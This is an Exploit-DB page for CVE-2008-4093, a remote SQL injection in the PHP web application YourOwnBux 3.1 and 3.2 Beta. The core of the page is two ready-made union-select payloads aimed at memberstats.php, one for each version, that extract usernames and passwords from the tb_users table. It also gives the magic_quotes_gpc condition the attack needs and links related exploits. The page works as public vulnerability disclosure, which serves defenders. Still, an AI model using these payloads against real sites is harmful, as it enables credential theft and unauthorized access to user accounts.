Yourownbux 3.1 / 3.2 Beta

EDB-ID: 6321	Author: ~!Dok_tOR!~	Published: 2008-08-27
CVE: CVE-2008-4093	Type: Webapps	Platform: PHP
Aliases: N/A	Advisory/Source: N/A	Tags: Vulnerability
E-DB Verified:	Exploit: Download / View Raw	Vulnerable App: N/A

« Previous Exploit Next Exploit »

YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: YourOwnBux
Version: 3.1, 3.2
Price: $39.99
DEMO: yourownbux.com/demos/
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

3.2 Beta version

Exploit:

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/*

3.1 version

Exploit:

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/*

# milw0rm.com [2008-08-27]

Related Exploits

Trying to match CVEs (1): CVE-2008-4093
Trying to match OSVDBs (1): 48164
Other Possible E-DB Search Terms: Yourownbux 3.1 / 3.2 Beta, Yourownbux 3.1, Yourownbux

Date	D	V	Title	Author
2008-09-11			Yourownbux 4.0 - 'cookie' Authentication Bypass	Tec-n0x
2008-10-07			Yourownbux 4.0 - 'cookie' SQL Injection	Tec-n0x

Yourownbux 3.1 / 3.2 Beta - SQL Injection

Related Exploits